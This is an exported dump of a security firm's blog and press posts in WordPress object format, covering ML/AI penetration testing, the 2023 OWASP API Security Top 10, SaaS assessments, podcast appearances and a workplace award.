[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => insidebigdata-netspi-debuts-ml-ai-penetration-testing
[to_ping] =>
[pinged] =>
[post_modified] => 2023-09-13 11:46:18
[post_modified_gmt] => 2023-09-13 16:46:18
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=31027
[menu_order] => 18
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[12] => WP_Post Object
(
[ID] => 30754
[post_author] => 91
[post_date] => 2023-08-08 05:00:00
[post_date_gmt] => 2023-08-08 10:00:00
[post_content] =>
The new ML/AI pentesting solution combines the company’s proven pentesting methodology with its deep adversarial machine learning knowledge to help organizations build more secure models.
Minneapolis, MN – August 8, 2023 – NetSPI, the global leader in offensive security, today debuted its ML/AI Pentesting solution to bring a more holistic and proactive approach to safeguarding machine learning model implementations. The first-of-its-kind solution focuses on two core components: Identifying, analyzing, and remediating vulnerabilities on machine learning systems such as Large Language Models (LLMs) and providing grounded advice and real-world guidance to ensure security is considered from ideation to implementation.
As adoption of ML and AI accelerates, organizations must understand the unique threats that accompany this technology to better identify areas of weakness and build more secure models. NetSPI's testing methodology is rooted in adversarial machine learning, the study of adversarial attacks on ML and corresponding defenses. With this foundational research, the company’s offensive security experts have the knowledge to better understand and mitigate vulnerabilities within ML models by putting them to the test against real adversarial attack techniques.
“Securing technologies like ML/AI can be daunting, but our customers do not have to navigate the journey alone,” said Nick Landers, VP of Research at NetSPI. “Innovation in this space shows no signs of stopping – and we’re excited to bring our wealth of knowledge in machine learning, cybersecurity, and data science to help organizations navigate the emerging space with security top of mind. Our goal is not to slow innovation, but to help organizations innovate with confidence.”
NetSPI's ML/AI Pentesting solution caters to organizations seeking to enhance the robustness, trustworthiness, and security of their ML systems, with a particular focus on LLMs. During an assessment, customers can expect:
A dedicated partner through ideation, development, training, implementation, and real-world deployment
Holistic and contextual security testing across their tech stack, leveraging NetSPI’s application cloud, and network security testing expertise
An evaluation of defenses against major attacks and tailored adversarial examples
Guidance on how to build a robust pipeline for development and training
Comprehensive vulnerability reports and remediation instructions delivered via NetSPI’s PTaaS platform
“Every new paradigm shift brings along a new set of opportunities and challenges, and the widespread adoption of LLMs is no different,” said Vinay Anand, Chief Product Officer at NetSPI. “There is no silver bullet for ML/AI security, yet securing these systems is paramount. Our new pentesting solution equips businesses with the knowledge, tools, and best practices needed to protect their machine learning systems from adversarial threats and improve overall resiliency to attacks.”
NetSPI will be available to discuss the new ML/AI Penetration Testing solution onsite at Black Hat USA from August 9-10. Schedule a meeting or meet the team at booth #1069.
NetSPI is the global leader in offensive security, delivering the most comprehensive suite of penetration testing, attack surface management, and breach and attack simulation solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. Its global cybersecurity experts are committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with offices across the U.S., Canada, the UK, and India.
[post_title] => NetSPI Debuts ML/AI Penetration Testing, a Holistic Approach to Securing Machine Learning Models and LLM Implementations
[post_excerpt] => Read about NetSPI’s new ML/AI Penetration Testing solution and learn how partnering with the leader in offensive security can help you build more secure and robust models.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => ml-ai-pentesting
[to_ping] =>
[pinged] =>
[post_modified] => 2023-08-21 08:51:45
[post_modified_gmt] => 2023-08-21 13:51:45
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=30754
[menu_order] => 19
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[13] => WP_Post Object
(
[ID] => 30732
[post_author] => 91
[post_date] => 2023-08-03 09:00:00
[post_date_gmt] => 2023-08-03 14:00:00
[post_content] =>
The 2023 OWASP API Security Top 10 is out now — take a look! We summarized the changes below and gathered perspectives from application security pros and NetSPI partners on the biggest updates. Take a look at what changed and what industry leaders think about it.
Notable Updates from 2023 List
Remains in 1st place: API1:2023 – Broken Object Level Authorization
Remains in 2nd place: API2:2023 – Broken Authentication
Remains in 5th place: API5:2023 – Broken Function Level Authorization
Moved from 7th to 8th place: API8:2023 – Security Misconfiguration
API6:2023 – Unrestricted Access to Sensitive Business Flows
API7:2023 – Server Side Request Forgery
API10:2023 – Unsafe Consumption of APIs
Meet the Contributors
Based on these updates, we asked NetSPI partners and our Director of Application Pentesting, Paul Ryan, a few questions on the reasons behind these key themes and the importance of API security. Here’s what they said.
What conclusions can you draw from the updated list? Are there any key themes to call out?
“The common theme is all threat agents and attack vectors are at an easy exploitability level. If it’s that easy, watch out for the mass amount of bots attacking.”
– Mike Charobee, Cyber Buyer Founder
“Several vulnerabilities in the updated list are related to broken or insufficient authorization mechanisms, such as API1:2023, API3:2023 and API5:2023. This highlights the need for secure access controls at various levels throughout APIs, from the object to the functional level. API4:2023 and API6:2023 show the need for managing and restricting resources consumed by APIs. API9:2023 and API10:2023 illustrate the importance of maintaining an accurate inventory of APIs and managing third-party APIs securely.”
– Josh Smith, Cyber Threat Analyst and author of Nuspire’s quarterly Threat Report
“Proper authorization of APIs continues to be critical as it encompasses not only the top spot again, but a full three of the top 10 categories (API1, API3, API5). The second theme is the number of ’new’ vulnerability categories. While these are not ‘net new’ per se, they do represent that the API attack surface is changing: as companies move to protect and fix areas in the 2019 Top 10, attackers continue to adapt and focus on other areas.”
– Paul Ryan, NetSPI Director, Application Pentesting
“The changes are in direct response to the growing Digital Transformation move, as well as Containerization, and the plethora of needs APIs fulfill to meet these modernization demands. Couple this with the business pressures to adopt and implement a Digital Transformation strategy and the skills shortage in Cybersecurity, DevOps teams are completing their task either trusting the third-party API security or rushing development without adopting a security-by-design approach from the start.”
– Michael Yates, All Lines Technology Chief Information Security Officer
“When the first version of the OWASP Top 10 API Security list came out in 2019, the thing that most struck me was how few of the items on the list were conducive to detection by automated tools. Less than half would at least partially benefit from some sort of tooling-based detection.
In the 2023 version, it’s even worse. API7 – Server-Side Request Forgery (SSRF) is the only one remaining that can be completely or almost completely addressed by traditional AST tools. API8 – Security Misconfiguration can be partially addressed by emerging infrastructure as code (IaC) security tools, and there are tools that will help with API9 – Improper Inventory Management, which may be more recognizable as ‘shadow APIs.’
The rest are nearly impossible to automatically detect with automation because the design intent of the developer is a factor in all of them and, putting AI aside for a moment, determination of intent is not conducive to automation. Design and engineering excellence complemented by pentesting and threat modeling (all heavy on human effort) are how you address them.”
– Larry Maccherone, Contrast Security Dev[Sec]Ops Transformation Architect
There are FIVE new vulnerabilities on the list, why do you think these have become more prevalent?
“Lack of resource and rate limiting (2019) has been renamed and separated to become API4 and API10; but throttling limits continue to be overlooked in API security. Also, API10 in particular is interesting as it represents how applications are very rarely siloed. Vulnerabilities in APIs can have both north-south and east-west effects that impact other interconnected systems which consume them.”
– Paul Ryan, NetSPI Director, Application Pentesting
“Here are a few thoughts I have. But take it like opinions on music. There is a little bit of country and a lot of rock and roll.
API2:2023 – Broken Authentication: This one is a no brainer. Authentication is the gold standard of security. You have to be able at a baseline level to know who, what, when, and how someone accesses anything. Many times, developers, security analysts, IT admin, and so on are not keeping authentication tokens updated and managed properly. This leads to temporary or permanent identification takeover.
API4:2023 – Unrestricted Resource Consumption: This is like allowing my kids to have as much ice cream as they want. Or at least until the ice cream runs out. Leaving me with no ice cream when I need it at 2 am. You do not want to see me with no ice cream at 2 am. APIs are processes. Processes need resources. Memory, CPU, Bandwidth, and Storage. Unchecked resource requests can overrun your APIs causing systems to crash. Crashed systems cost money and loss of revenue which is not a good combination. It can also lead to denial-of-service attacks.
API7:2023 – Server Side Request Forgery: The old “Switch-A-Roo". API request that doesn’t ask for or check the returning URI. Allowing a change of address. This can also bypass firewalls and VPNs as most are not configured to check for malicious URI via API. My kids used to do this with their Christmas presents sometimes. Move a name tag from one gift to another in hopes that they get the new Nintendo switch and not a box of tighty-whities.
API10:2023 – Unsafe Consumption of APIs: This might be one of the most important areas for the DevOps and InfoSec teams to communicate. You might have tight security with your APIs, but you must demand that same of the APIs you are interacting with. Developers, develop. It's in their name. It’s their nature. It's what they do. One of the most creative, efficient, and trusting groups of people you will ever meet. Sometimes too trusting. It's exciting to hook up with a new API. It looks good. It swiped on you; you swiped back. Now let's meet for coffee. Then the API shows up. Clearly using a different photo. But now you are there paying for their coffee. What's the old Ronald Reagon quote? Trust but verify. That needs to be tattooed on anyone who develops APIs.
I encourage all my DevOps and InfoSec friends to go give this a read. More information is available on the official website. Not as fun to read, but more technical with information that may keep your company, your team, and you out of the news.”
“These new vulnerabilities reflect the shifts in the threat landscape and emerging preferred/new attack vectors. Increases in automation and digitization have spurred surges in API usage worldwide. When not properly managed, APIs can become an attack vector for things such as denial of service attacks (API4:2023), misuse of functionalities (API6:2023), exploitation of weaknesses in the way APIs interact with services (API7:2023) and vulnerabilities from third-party integrations (API10:2023). And properly managing APIs is easier said than done, given how many exist today and the number of versions for each one (API9:2023). These are real threats affecting organizations, and due to their challenges and severity, OWASP has included them within this list.”
– Josh Smith, Cyber Threat Analyst and author of Nuspire’s quarterly Threat Report.
“I only consider one and a half of them as truly “new.” API7: 2023 replaces API8: 2019 and API10: 2023 replaces API10: 2019. The other three are merely wording refinements, or, in the case of API3: 2023, a merging of two from the 2019 list. There was a release candidate in March 2023 that showed five as “new” but there were changes made before the final, driven by sharp feedback against the release candidate, and some of those that were labeled as “new” were essentially refinements of a roughly equivalent item from the 2019 list.
As I said, most of the difference is refinement in wording and scope.
Let’s discuss those one and a half that are ‘new’ one at a time:
The half-new. API7:2023 – Server-Side Request Forgery (SSRF) replaces API8:2019 – Injection flaws. The relative incidence of vulnerabilities of these two types have not changed much from 2019 to 2023 so I assume this change is mostly driven by an increase in the volume of attacks we’re seeing against SSRF vulnerabilities. SSRF attacks are newer than injection attacks and it has taken a while for attackers to understand how to exploit. This also makes sense as more container-based systems come online.
I see this is only ‘half new’ because the committee seemed to think that ‘Injection is now essentially part of API7:2023 – Security Misconfiguration’. That’s a huge stretch. While a small portion of injection attacks can be prevented with configuration changes, injection attacks are much more a function of code than configuration.
The full-new. API10:2023 – Unsafe Consumption of APIs replaces API10:2019 – Insufficient Logging & Monitoring. You would expect changes to occur at the bottom of the list and we don’t know if API10:2019 moved down to #11 or #111 so this is not a dramatic change.”
– Larry Maccherone, Contrast Security Dev[Sec]Ops Transformation Architect
What factors are impacting these changes?
“With the increasing use of APIs, more vulnerabilities emerge. API interactions are becoming more and more complex, allowing potential misconfigurations, inventory management issues and third-party risk from third-party service APIs.”
– Josh Smith, Cyber Threat Analyst and author of Nuspire’s quarterly Threat Report
“Not enough time to thoroughly investigate these threats and their tasks need to be persistently checked.”
– Mike Charobee, Cyber Buyer Founder
“The demand for more complex and more interconnected information systems as well as tailor-made data sets are requiring development teams to expose APIs to their applications and data. Along with this demand is the requirement to build, maintain, and (usually as an afterthought) protect these APIs. The changes seen in the Top 10 are due to a combination of more available APIs and a lack of resources or awareness to protect them.”
– Paul Ryan, NetSPI Director, Application Pentesting
"Refinement of wording and scope is the primary factor of change. Not all of that refinement has gone in the right direction though as I don’t see how Inject attacks can be considered mostly covered by Security Misconfiguration.”
– Larry Maccherone, Contrast Security Dev[Sec]Ops Transformation Architect
Why is API security important? What’s the risk of an insecure API?
“API security is crucial to an organization’s cybersecurity posture because these APIs act as a gateway to an organization’s data and services. An insecure API can lead to the exposure of sensitive data and data breaches. It could allow unauthorized access to critical business functionalities, causing misuse or disruption of services. APIs also could provide a threat actor initial access into a network to carry out further attacks. With how interconnected organizations are, an insecure API could put a single organization at risk and the organizations they interact with. API attacks could lead to loss of data, damage to a company’s reputation, financial loss and loss of customer trust.”
– Josh Smith, Cyber Threat Analyst and author of Nuspire’s quarterly Threat Report
“The majority of businesses never check their API security. 'Don’t expect what you don’t expect.'”
– Mike Charobee, Cyber Buyer Founder
“APIs act as gateways to the functions and data within an organization; they need to be protected with the same level of rigor as other applications or database systems. Like application security, cloud security, and mobile security, organizations need to recognize the importance of API security in their overall security program. Not validating the security of APIs leaves the gate open to attackers to try to exploit any of the previous or “new” Top 10.
– Paul Ryan, NetSPI Director, Application Pentesting
“API security enables the protection of the availability, integrity, and confidentiality of the business-critical applications and sensitive data the API was designed to communicate. Not only the company data but also third-party data is at risk. Given the rise of cyber-attacks, whether criminal or nation-state, and the explosion of API use, the risk of an incident or breach is imminent unless DevOps standards include the design, implementation, and continuous monitoring and maintenance of API security.”
– Michael Yates, All Lines Technology Chief Information Security Officer
“Most people think of applications from the perspective of the UI. However, all those UIs speak through APIs to where the real risk resides, on the server or in the cloud. This is not news to application security experts and tooling vendors. The vast majority of what every application security vendor does is at the API level.
So, while it’s hip to think of API Security as a new category, it’s not.
You do more to protect your application by focusing on traditional application security. All of the so-called API Security Top 10 items, with one exception, are best addressed with traditional application security thinking (threat modeling, pen testing, AST tools, etc.).
The one exception is shadow APIs (aka API9:2023 - Improper Inventory Management). These are APIs that your development teams are putting out there that security has no prior knowledge of. There are specialist tools, and free alternatives, that will help you discover these. Those same API specialist tools also attempt to do things that more established AST tool vendors do but they are a generation behind, so you are better off not using them.
Also, as an established application security tool vendor, we’re not sitting idly by. We’re working on major functionality right now that will help address not just shadow APIs but other ways in which the applications your organization has built behave differently than you expected.”
– Larry Maccherone, Contrast Security Dev[Sec]Ops Transformation Architect
Reliance on APIs is only going to continue, making the security of those APIs a prime area to focus. Inventorying APIs and evaluating them against the OWASP API Security Top 10 is a lot easier with the right partner clearing your way. Take a look at NetSPI’s API penetration testing services and get in touch with us for a quote.
This post was written in collaboration with NetSPI’s Partners. Learn more about becoming a NetSPI partner here.
[post_title] => Industry Leaders Weigh in on the 2023 OWASP API Security Top 10
[post_excerpt] => We asked NetSPI’s Partners for their take on the latest changes to the 2023 OWASP API Security Top 10. Here’s what they said.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => industry-leaders-on-the-2023-owasp-api-security-top-10
[to_ping] =>
[pinged] =>
[post_modified] => 2023-08-02 11:05:08
[post_modified_gmt] => 2023-08-02 16:05:08
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=30732
[menu_order] => 20
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[14] => WP_Post Object
(
[ID] => 30679
[post_author] => 91
[post_date] => 2023-07-25 09:30:00
[post_date_gmt] => 2023-07-25 14:30:00
[post_content] =>
Offensive security leader brings proactive security to Microsoft 365 and Salesforce environments, supporting discovery and remediation of SaaS vulnerabilities and misconfigurations.
Minneapolis, MN – July 25, 2023 —NetSPI, the global leader in offensive security, today unveiled its Software as a Service (SaaS) Security Assessment, bringing proactive security to Microsoft 365 and Salesforce environments. NetSPI’s SaaS Security Assessment leverages both automated and manual testing methods developed from years of industry-leading application and cloud assessments to discover and help remediate vulnerabilities and misconfigurations.
SaaS applications play a critical role in attack surface expansion as businesses continue to increasingly depend on them for critical operations and data management. Yet, 81% of organizations have sensitive SaaS data exposed. Delivered on NetSPI’s Penetration Testing as a Service (PTaaS) platform, the SaaS Security Assessments include real-time reporting, remediation guidance, project management and communication, as well as the ability to track data and discover vulnerability trends.
“SaaS security is imperative, but it’s often overlooked due to organizations’ false assumption that SaaS vendors will protect customer data and app usage – creating a major blind spot for security teams, and increased opportunity for malicious actors,” said Karl Fosaaen, Vice President of Research at NetSPI. "As the attack surface continues to evolve and expand, protecting SaaS apps must become an integral part of businesses’ security strategy. Our application and cloud pentesting expertise puts us ahead of the curve and brings unparalleled insights to the SaaS security market at a time when it’s needed most.”
NetSPI’s SaaS Security Assessment addresses:
Identity & Access Management – Ensuring only authorized users have access to SaaS applications
Data Management – Protecting every form of data in an organization’s possession
Data Storage – Protecting where data is stored
Email Security – Protecting applications from unauthorized access through email account attack vectors
Account Protection – Maintaining account integrity and confidentiality
Password Security – Ensuring password policies follow industry best practices
Integrations – Validating the security of third-party integrations
The service is currently being offered for Salesforce and Microsoft 365 in accordance with industry standards such as CIS Benchmarks, with additional security checks derived from NetSPI’s extensive experience in testing these environments.
To learn more about NetSPI’s SaaS Security Assessments, or its comprehensive offensive security solutions, please visit www.netspi.com.
About NetSPI
NetSPI is the global leader in offensive security, delivering the most comprehensive suite of penetration testing, attack surface management, and breach and attack simulation solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. Its global cybersecurity experts are committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with offices across the U.S., Canada, the UK, and India. Follow NetSPI on Facebook, Twitter, and LinkedIn.
The following strategies help your business not only prepare for LOTL attacks but also reduce threat actors’ opportunities to compromise your legitimate systems.
Use LOLBINS To Track Binary Activity
The Living off the Land Binaries, Scripts, and Libraries project (LOLBAS) offers a comprehensive list of exploits attackers use. It’s best to study one binary (LOLBIN) at a time, examining how the specific program is typically used. Once your team knows what appropriate usage looks like, you can begin identifying abnormal behavior from that program.
Derek Wilson, principal consultant at security firm NetSPI, underscored the importance of using this resource. “By finding a way to baseline detections against something like the Living Off the Land Binaries And Scripts (LOLBAS) project, which is set up to track LOTL threats, teams can then build proactive detection plans for the procedures that aren’t caught,” he said.
Wilson recommended additional software to help teams develop general detection methods. “Breach and attack simulation (BAS) tools are invaluable in baselining detective controls and continuously improving detection of LOTL attacks,” he said. BAS tools give security teams insight into an attack lifecycle, behaving like a threat actor might to find security weaknesses more quickly.
In this episode I had a chance to talk with Nabil Hannan about rethinking your penetration testing strategy and moving towards Attack Surface Management. Nabil is the Field Chief Information Security Officer for NetSPI and has a ton of useful information to share about starting this journey.
Talking points include:
What are the biggest misconceptions with pentesting?
The problem with buying security 'things'
Understanding your Attack Surface using Breach and Attack Simulations
We hosted the crew from Hacker Valley Media on LinkedIn Live for a conversation on the top takeaways gained from our 2023 Offensive Security Vision Report. The report analyzed over 300,000 anonymized findings from thousands of pentest engagements to shed light on the state of offensive security and provide insights into how security teams can tangibly approach the evolving threat landscape.
NetSPI Head of Product Cody Chamberlain and guests Ron Eddings and Chris Cochran from Hacker Valley Media explored the highlights including the importance of prioritizing vulnerabilities, a constant reminder to focus on the basics, and how we can show empathy by asking for help while staying committed to the larger mission that keeps us connected: security.
These quotes come directly from Cody Chamberlain, Ron Eddings and Chris Cochran while participating in our LinkedIn Live webinar, “An Inside Look at NetSPI’s Offensive Security Vision Report.” We pulled these soundbites because they capture the state of offensive security in today’s landscape.
We’d love to hear what you’d add to this list! Share your two cents on the state of offensive security by tweeting us @ NetSPI.
Prioritizing Remediation Efforts is the Key to Success
“You have to find the needle in the haystack on which vulnerability to focus on. Unfortunately, it's like finding the needle inside the needle stack. When the needle looks like all the other needles, how do you really find it?”
“Prioritization is one of those beasts that’s just hard to wrangle.”
“If you don't have a mechanism to prioritize, you'll be lost. You'll prioritize the wrong things, and ultimately, waste time.”
Prioritizing vulnerabilities is crucial in breaking the cycle of vulnerability management challenges. Security teams simply can’t fix every vulnerability. Rather, they must focus on which vulnerabilities pose the greatest risk if exploited based on where they exist, the business priorities, the likelihood of exploitation, and the threat landscape.
Without effective prioritization, security teams are faced with a constant influx of alerts and information, leading to analysis paralysis and misused time. Prioritization allows teams to allocate their precious time and resources to fix critical and high-risk vulnerabilities, ensuring that the most impactful security issues are addressed first. However, establishing a prioritization mechanism requires initial effort and a willingness to ask and answer difficult questions upfront.
Go Back to the Basics
“You want to play but you’ve got to clean your room before you play, right? You have to make sure you don't have any public facing s3 buckets before you start playing with ChatGPT.”
“It's just another reminder that we really need to focus on the basics.”
“Going back to those fundamentals is what's going to lead to success.”
While the allure of new technologies is enticing, focusing on the basics and maintaining foundational security measures is essential to prevent breaches. Time and time again we find breaches happen because of simple mistakes that get overlooked.
Security teams must strike a balance between addressing business-as-usual security tasks and exploring new technologies that keep teams engaged and motivated, while also ensuring that the necessary groundwork is laid before diving into the latest trends. By achieving a mature security posture through focusing on fundamentals, organizations gain the freedom to explore new technologies and initiatives with a solid foundation in place.
Compliance Does Not Equal Security
“In our hearts, compliance does not equal security. But compliance gets a lot of budget, which helps us do security.”
NetSPI’s Vision Report explored high-level industry data on vulnerabilities and security, showing the government, non-profit, and healthcare industries had the largest volume of critical and high severity vulnerabilities. On the other hand, the insurance and financial services industries had the lowest volume.
This indicates a stark contrast between two highly regulated industries: healthcare and financial services.
Healthcare security leaders have expressed challenges in keeping up with privacy regulations, while the financial services industry has leaned into evaluating and penalizing risk management deficiencies. Perhaps the healthcare industry will follow suit toward stricter enforcement.
Plan for Hiring Early On
“A lot of times when you build your hiring plan, you don't necessarily think, ‘okay, I'm going to need to articulate the value of someone entry level to my stakeholders.’”
This situation can result in a harder sell for an entry-level hire when the need arises. Results from the Offensive Security Vision Report reveal a pressing need for increased investment in entry-level cybersecurity roles. A significant majority of security leaders (55 percent) reported having five or fewer roles budgeted for in 2023.
Moreover, when asked about the number of entry-level positions, 71 percent of respondents indicated that less than one-fourth of the budgeted roles were allocated for entry-level candidates, and 46 percent had no plans for entry-level hiring in 2023. These findings underscore the urgency for the industry to prioritize investment in cultivating new talent. To address the global skills gap, it is crucial to provide hands-on training and support for individuals entering the cybersecurity field. By investing in entry-level professionals, the industry can move toward bridging the gap and fostering a robust pipeline of skilled cybersecurity experts.
Consider the Interconnected Nature of Your Role
“The work we do is in the weeds. It's asset management. It's vulnerability management. It's thankless, it's frustrating. So anything that we as an industry can do to remind each other that there is a mission — there’s a bigger mission than all of us — is appreciated because security is interconnected.”
While it's easy to get lost in the details on which vulnerabilities deserve the bulk of our attention, we need to stay grounded in the bigger picture: it’s not just about checking the box on a single task, but seeing how your effort fits into the larger picture of creating a secure end state for a business.
[post_title] => 9 Quotes that Capture the State of Offensive Security
[post_excerpt] => These quotes from NetSPI and Hacker Valley Media’s LinkedIn Live webinar discuss highlights from NetSPI’s 2023 Offensive Security Vision Report.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => quotes-on-the-state-of-offensive-security
[to_ping] =>
[pinged] =>
[post_modified] => 2023-06-27 11:46:29
[post_modified_gmt] => 2023-06-27 16:46:29
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=30456
[menu_order] => 28
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[18] => WP_Post Object
(
[ID] => 30404
[post_author] => 91
[post_date] => 2023-06-21 09:00:00
[post_date_gmt] => 2023-06-21 14:00:00
[post_content] =>
During Infosecurity Europe 2023, NetSPI Field CISO Nabil Hannan caught up with Sean Martin of ITSP Magazine to discuss API security, attack surface management, and more. Listen to the podcast here.
+++
Live on-location from Infosecurity Europe 2023, Sean Martin connects with Nabil Hannan, the field CISO at NetSPI, to discuss Attack Surface Management (ASM) and how it has evolved in recent years to become the minimum cybersecurity benchmark that organizations need. ASM provides a more targeted approach to vulnerability management, allowing testers to focus on building a platform with automation that identifies areas that need attention and validates them.
Sean and Nabil also cover API security, the challenges of authentication and authorization, and the need for organizations to prioritize building secure-by-design frameworks. Nabil stresses the importance of understanding an organization's external perimeter and what exposures might exist, as well as the need for good cybersecurity hygiene that starts with good cybersecurity basics before bringing others in to help with the problem.
ASM is an important element in modern cybersecurity with its role as the first line of defense reinforces the critical need to have a continuous view of an organization's external-facing perimeter.
Listen to the full podcast episode below or online here.
[post_title] => ITSP Magazine: Building A Better Defense With Attack Surface Management | A Company Briefing From Infosecurity Europe 2023
[post_excerpt] => During Infosecurity Europe 2023, NetSPI Field CISO Nabil Hannan caught up with Sean Martin of ITSP Magazine to discuss API security, attack surface management, and more.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => itsp-magazine-attack-surface-management
[to_ping] =>
[pinged] =>
[post_modified] => 2023-06-22 16:17:54
[post_modified_gmt] => 2023-06-22 21:17:54
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=30404
[menu_order] => 31
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[19] => WP_Post Object
(
[ID] => 30396
[post_author] => 91
[post_date] => 2023-06-20 09:00:00
[post_date_gmt] => 2023-06-20 14:00:00
[post_content] =>
On this episode of the 8th Layer Insights podcast, Perry sits down with Chad Peterson, Managing Director at NetSPI, to discuss the importance of penetration testing. We touch on aspects of social engineering, discussing complex security issues with Boards of Directors, the prevalence of ransomware, and some of the unique challenges facing the healthcare industry.
Listen to the full podcast episode below or online here.
[post_title] => 8th Layer Insights [Ep 34]: Something Wicked This Way Comes: Pentesting Your Environment w/Chad Peterson of NetSPI
[post_excerpt] => On this episode of the 8th Layer Insights podcast, Perry sits down with Chad Peterson, Managing Director at NetSPI, to discuss the importance of penetration testing.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => 8th-layer-insights-pentesting-your-environment
[to_ping] =>
[pinged] =>
[post_modified] => 2023-06-22 16:16:41
[post_modified_gmt] => 2023-06-22 21:16:41
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=30396
[menu_order] => 33
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[20] => WP_Post Object
(
[ID] => 30357
[post_author] => 91
[post_date] => 2023-06-16 09:57:59
[post_date_gmt] => 2023-06-16 14:57:59
[post_content] =>
Minneapolis, MN – June 16, 2023 — NetSPI, the global leader in offensive security, has been named one of the Top 200 Workplaces in Minnesota by the Star Tribune. The company was selected as one of the best places to work in the state for a third consecutive year, based on an employee survey measuring engagement, organizational health, and satisfaction.
NetSPI ranks #12 on the midsize companies list, and was honored for its cultural excellence, with special recognition for its innovation, employee appreciation, work-life flexibility, compensation and benefits, leadership, and purpose and values. These recognitions exemplify NetSPI’s values and are a core driver for its continuous growth and positive impact on the cybersecurity industry.
“Our workplace culture is the foundation of our success. Recognition like this is a great reminder of how special the people at NetSPI are,” said Heather Crosley, VP of People Operations. “It’s no easy feat to maintain a strong culture while experiencing exponential growth. I’m proud of this team for maintaining a positive environment of innovation and collaboration not only in Minnesota, but across our global offices.”
NetSPI is on a growth trajectory, most recently achieving 58 percent organic revenue growth in 2022. This advancement continues to be driven by an emphasis on evolving its powerful offensive security platforms for its Pentesting as a Service, Attack Surface Management, and Breach and Attack Simulation solutions, global expansion in the EMEA region, and a customer-first approach to cybersecurity. Last year, the company hired more than 230 employees and promoted over 170 staff members. In 2023 to date, NetSPI has welcomed 136 employees to the team to support the delivery and development of its award-winning offensive security solutions.
“The companies in the Star Tribune Top 200 Workplaces deserve high praise for creating the very best work environments in the state of Minnesota,” said Star Tribune CEO and Publisher Steve Grove. “My congratulations to each of these exceptional companies.”
A complete list is available at www.startribune.com/mn-top-workplaces and will also be published in the Star Tribune Top Workplaces special section on Sunday, June 18.
For a glimpse of what it’s like to work at NetSPI read the blog post recap of the company’s Employee Kickoff event, written by CEO Aaron Shilts. Visit www.netspi.com/careers to explore open job opportunities.
https://www.youtube.com/watch?v=plEQPZzXJEs
About NetSPI
NetSPI is the global leader in offensive security, delivering the most comprehensive suite of penetration testing, attack surface management, and breach and attack simulation solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. Its global cybersecurity experts are committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with offices across the U.S., Canada, the UK, and India.
[post_title] => NetSPI Named a 2023 Top 200 Workplace in Minnesota, Honored for Cultural Excellence
[post_excerpt] => NetSPI was selected for Star Tribune’s Top 200 Workplaces in Minnesota list. Read why NetSPI is one of the best companies to work for in MN!
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => top-200-minnesota-workplaces-2023
[to_ping] =>
[pinged] =>
[post_modified] => 2023-06-16 09:58:00
[post_modified_gmt] => 2023-06-16 14:58:00
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=30357
[menu_order] => 35
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[21] => WP_Post Object
(
[ID] => 30401
[post_author] => 91
[post_date] => 2023-06-16 09:00:00
[post_date_gmt] => 2023-06-16 14:00:00
[post_content] =>
In this episode of the Evo Cyber Security podcast, host James Price dives into the fascinating world of penetration testing, exploring the art and science of hacking your own applications. Joining him are esteemed guests Ron Kuriscak, Managing Director at NetSPI; Derek Fisher, Head of Product Security at Envestnet, Inc.; and Abhishek Ramchandran, Penetration Testing Team Lead at Siemens.
Together, they share their expertise and insights, shedding light on the critical importance of proactive security measures in an increasingly interconnected digital landscape. Don’t miss this enlightening discussion with top industry professionals.
Listen to the full podcast episode below or online here.
Putting the developer in the driver’s seat is the primary premise of DevSecOps. Empower the developer with automation, tools, information, training — and wonders happen. Now, ‘the developer’ here is, of course, part of a team and you’ll need to make sure that you equip the team with the right skills, which means development, testing, security, and operational skills.
These teams then go on their journey to develop your next generation product. This undoubtedly will include more communication from more sources compared to your current generation product. This will also include more open-source components and libraries compared to your previous generation. That is simply how the world moves nowadays: users are expecting more capabilities, more integration, more slick user interfaces, single sign-on, and on and on.
This will stretch the capabilities of your team; the inclusion of more technology will make it hard for them to truly be an expert in everything. The push for more capabilities, in a shorter timeframe, typically with reduced headcount makes it inevitable that corners will be cut. This is where problems can slip into your code, or worse, into your design. These can easily lead to security vulnerabilities that can be costly down the road.
